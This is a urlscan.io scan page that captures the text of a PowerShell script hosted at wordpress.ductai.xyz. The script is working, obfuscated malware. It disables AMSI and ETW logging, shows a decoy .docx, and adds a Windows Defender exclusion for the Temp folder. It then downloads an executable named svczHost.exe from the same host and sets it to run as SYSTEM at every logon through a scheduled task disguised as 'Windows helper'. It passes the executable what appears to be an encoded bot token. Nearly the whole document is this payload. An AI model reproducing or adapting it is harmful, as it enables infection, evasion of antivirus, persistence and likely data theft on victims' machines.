wordpress.ductai.xyz
Open in
urlscan Pro
2606:4700:3031::6815:428c
Public Scan
URL:
https://wordpress.ductai.xyz/file/ps/iy2m3.ps1
Submission: On October 30 via manual from NL — Scanned from NL
Submission: On October 30 via manual from NL — Scanned from NL
Form analysis 0 forms found in the DOM
Text Content
$xnnsdmvr=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("d1lzUExOU043NHNuTXB2aGtFQTVpRHRlbG8gLTEwMDE0MDczMjEzMzEgbWFuaA=="));
$fzadkis=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("NTY4OTMyNTQzNzpBQUVXa3RDQlg="));
$eaevkotyf=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("bXBcc3Zjekhvc3QuZXhl"));
$aadhy=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("QzpcV2luZG93c1xUZQ=="));
$afhwmylqrc=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("aW5kb3dzIGhlbHBlcg=="));
$pndoyulqwh=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("Vw=="));
$xxtzmdt=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("cnZpY2VtYW5o"));
$qqxkh=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("elNl"));
$qeyzidhcu=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("Y2VtYW5o"));
$itukikafr=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("elNlcnZp"));
$vankdpt=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("WVNURU0="));
$jylyzzdin=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("Uw=="));
$liwpfdn=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("NDM3OkFBRVdrdENCWHdZc1BMTlNONzRzbk1wdmhrRUE1aUR0ZWxvIC0xMDAxNDA3MzIxMzMxIG1hbmg="));
$tndtykwd=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("NTY4OTMyNQ=="));
$ohwhmlzn=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("b3dzXFRlbXBcc3Zjekhvc3QuZXhl"));
$xbsfhlum=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("QzpcV2luZA=="));
$jtimnyjd=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("ZG93c1xUZW1wXHN2Y3pIb3N0LmV4ZQ=="));
$jofxtlmr=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("QzpcV2lu"));
$lwzgfssr=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("dHRwczovL3dvcmRwcmVzcy5kdWN0YWkueHl6L2JkYXRhL2RhdGE="));
$lmzplou=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("aA=="));
$luuaoyxzj=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("b3dzXFRlbXA="));
$upznnngzwx=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("QzpcV2luZA=="));
$kxglpysgm=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("d3MgRGVmZW5kZXI="));
$ybqoc=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("V2luZG8="));
$xetisjwgai=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("QW50aXZpcnVzUHJvZHVjdA=="));
$qogxw=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(""));
$avifdw=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("cml0eUNlbnRlcjI="));
$jklsepa=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("Um9vdFxTZWN1"));
$nxqiw=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("bmRvd3MgRGVmZW5kZXI="));
$lfhgyev=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("V2k="));
$xjeonilch=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("bnRpdmlydXNQcm9kdWN0"));
$dxduw=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("QQ=="));
$qemcyvrjb=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("ZWN1cml0eUNlbnRlcjI="));
$kxcxen=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("Um9vdFxT"));
$nglnoo=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("L3dvcmRwcmVzcy5kdWN0YWkueHl6L2ZpbGUvZG9jL21hbmgvOGM0N2NkMGRlYzhlYzA3MjY0MTc1OGJjNWNiODgyZjAuZG9jeA=="));
$lymgzzo=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("aHR0cHM6Lw=="));
$yvzrxpujh=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("ZWMwNzI2NDE3NThiYzVjYjg4MmYwLmRvY3g="));
$wulos=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("OGM0N2NkMGRlYzg="));
$lsjippv=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("bGljLFN0YXRpYw=="));
$opzltv=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("Tm9uUHVi"));
$weelyluwj=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("ZXR3UHJvdmlkZXI="));
$ktkpyz=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(""));
$doerm=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLlRyYWNpbmcuUFNFdHdMb2dQcm92aWRlcg=="));
$tsrdvjof=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("U3lzdA=="));
$hrhhnw=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("YmxpYyxJbnN0YW5jZQ=="));
$zrwnxu=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("Tm9uUHU="));
$xwhiqo=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("bmFibGVk"));
$htyltptbj=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("bV9l"));
$coujxzipp=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("U3lzdGVtLkRpYWdub3N0aWNzLkV2ZW50aW5nLkV2ZW50UHJvdmlkZXI="));
$cgcdzen=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(""));
$cbfhvmtho=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("U3lzdGVtLkNvcmU="));
$vicqbarw=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(""));
$frqewi=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("YyxTdGF0aWM="));
$gwhkvgvqy=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("Tm9uUHVibGk="));
$nsmssqszqd=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("dEZhaWxlZA=="));
$jlolivymyu=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("YW1zaUluaQ=="));
$oteposte=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("ZW50LkF1dG9tYXRpb24uQW1zaVV0aWxz"));
$qxpigx=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("U3lzdGVtLk1hbmFnZW0="));
[Ref].Assembly.GetType(($qxpigx + $oteposte)).GetField(($jlolivymyu + $nsmssqszqd),($gwhkvgvqy + $frqewi)).SetValue($null,$true);
[Reflection.Assembly]::LoadWithPartialName(($vicqbarw + $cbfhvmtho)).GetType(($cgcdzen + $coujxzipp)).GetField(($htyltptbj + $xwhiqo),($zrwnxu + $hrhhnw)).SetValue([Ref].Assembly.GetType(($tsrdvjof + $doerm)).GetField(($ktkpyz + $weelyluwj),($gwhkvgvqy + $frqewi)).GetValue($null),0);
$fileName = ($wulos + $yvzrxpujh)
$tempFolder = [System.IO.Path]::GetTempPath();
$filePath = Join-Path -Path $tempFolder -ChildPath $fileName
$fileUrl = ($lymgzzo + $nglnoo);
$scriptBlock = {
param (
[string]$filePath,
[string]$fileUrl
)
if (-not (Test-Path -Path $filePath)) {
Invoke-WebRequest -Uri $fileUrl -OutFile $filePath
}
Start-Process -FilePath $filePath
}
$job = Start-Job -ScriptBlock $scriptBlock -ArgumentList $filePath, $fileUrl
if ($job.State -eq 'Running') {
} else {
}
$windowsDefender = Get-WmiObject -Namespace ($kxcxen + $qemcyvrjb) -Class ($dxduw + $xjeonilch) | Where-Object { $_.displayName -eq ($lfhgyev + $nxqiw) }
$otherAntivirus = Get-WmiObject -Namespace ($kxcxen + $qemcyvrjb) -Class ($dxduw + $xjeonilch) | Where-Object { $_.displayName -ne ($lfhgyev + $nxqiw) }
$isRunning = $false;
if ($windowsDefender -ne $null) {
$isRunning = $true;
Add-MpPreference -ExclusionPath ($upznnngzwx + $luuaoyxzj);
} elseif ($otherAntivirus -ne $null) {
} else {
$isRunning = $true;
}
if($isRunning -eq $false) {
exit;
}
function Download-FileWithRetry {
param (
[string]$url,
[string]$destination,
[int]$maxRetries = 30,
[int]$retryDelayInSeconds = 5
)
$retryCount = 0
$downloadSucceeded = $false
while ($retryCount -lt $maxRetries -and -not $downloadSucceeded) {
try {
if (Test-Path -Path $destination -PathType Leaf) {
return
}
$webClient = New-Object System.Net.WebClient
$webClient.DownloadFile($url, $destination)
if (Test-Path -Path $destination -PathType Leaf) {
$downloadSucceeded = $true
} else {
}
}
catch [System.Net.WebException] {
}
catch {
}
if (-not $downloadSucceeded) {
$retryCount++
if ($retryCount -lt $maxRetries) {
Start-Sleep -Seconds $retryDelayInSeconds
}
}
}
if (-not $downloadSucceeded) {
}
}
Download-FileWithRetry -url ($lmzplou + $lwzgfssr) -destination ($jofxtlmr + $jtimnyjd)
$action = New-ScheduledTaskAction -Execute ($jofxtlmr + $jtimnyjd) -Argument ($tndtykwd + $liwpfdn)
$principal = New-ScheduledTaskPrincipal -UserId ($jylyzzdin + $vankdpt) -RunLevel Highest
$trigger = New-ScheduledTaskTrigger -AtLogOn
$settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries
Unregister-ScheduledTask -TaskName ($itukikafr + $qeyzidhcu) -Confirm:$false
Register-ScheduledTask -Action $action -Principal $principal -Trigger $trigger -Settings $settings -TaskName ($itukikafr + $qeyzidhcu) -Description ($pndoyulqwh + $afhwmylqrc)
Start-Process -WindowStyle hidden -FilePath ($jofxtlmr + $jtimnyjd) -ArgumentList ($tndtykwd + $liwpfdn)
Wait-Job $job
Remove-Job $job